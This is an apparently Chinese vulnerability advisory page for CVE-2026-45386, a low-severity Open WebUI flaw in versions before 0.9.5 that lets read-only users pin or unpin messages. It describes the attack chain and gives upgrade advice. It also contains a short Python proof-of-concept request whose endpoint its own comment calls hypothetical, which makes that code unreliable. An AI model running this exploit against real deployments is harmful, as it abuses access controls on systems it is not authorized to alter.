CVE-2026-45386 CVSS 4.3 中危

CVE-2026-45386 Open WebUI权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45386

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.5版本之前，系统存在权限验证逻辑缺陷。当用户尝试对消息进行置顶或取消置顶操作时，虽然该操作本质上属于写入操作（修改数据库字段），但在标准频道中仅检查了用户的读取权限。这导致拥有只读权限的低权限用户可以非法修改任意消息的置顶状态，破坏了数据的完整性和系统权限管理机制。

技术细节

该漏洞源于Open WebUI在处理消息置顶功能时的访问控制逻辑错误。置顶操作涉及修改数据库中消息的is_pinned、pinned_by和pinned_at字段，属于典型的写操作。然而，在受影响版本中，后端API接口在处理标准频道的置顶请求时，仅验证了请求者是否具有读取消息的权限，而未验证其是否具备修改消息的权限。攻击者只需拥有账号登录权限（低权限用户），即可通过向特定API端点发送构造的HTTP请求（如POST请求），篡改任意消息的置顶状态。这利用了业务逻辑层对权限校验的不完整性，绕过了原本设计的角色访问控制（RBAC）策略。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为Open WebUI，且版本低于0.9.5。

STEP 2

获取低权限账号

攻击者注册或获取一个具有只读权限的普通用户账号。

STEP 3

发送恶意请求

攻击者使用低权限账号的Token，向置顶接口发送POST请求，指定任意消息ID。

STEP 4

权限绕过与状态修改

系统由于仅校验读权限，错误地执行了写操作，修改了消息的置顶状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, token, message_id):
    """
    PoC for CVE-2026-45386: Pin/Unpin message via low-privilege account.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Endpoint to pin a message (hypothetical based on description)
    url = f"{target_url}/api/v1/chats/{message_id}/pin"
    
    try:
        response = requests.post(url, headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful: Message pinned.")
            return True
        else:
            print(f"[-] Failed: Status code {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Usage
# exploit("http://localhost:3000", "READ_ONLY_USER_TOKEN", "12345")

影响范围

Open WebUI < 0.9.5

防御指南

临时缓解措施

建议管理员立即将Open WebUI升级到0.9.5版本。如果暂时无法升级，应严格限制普通用户对标准频道的访问权限，或通过Web应用防火墙（WAF）拦截针对置顶相关API的非管理员请求，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表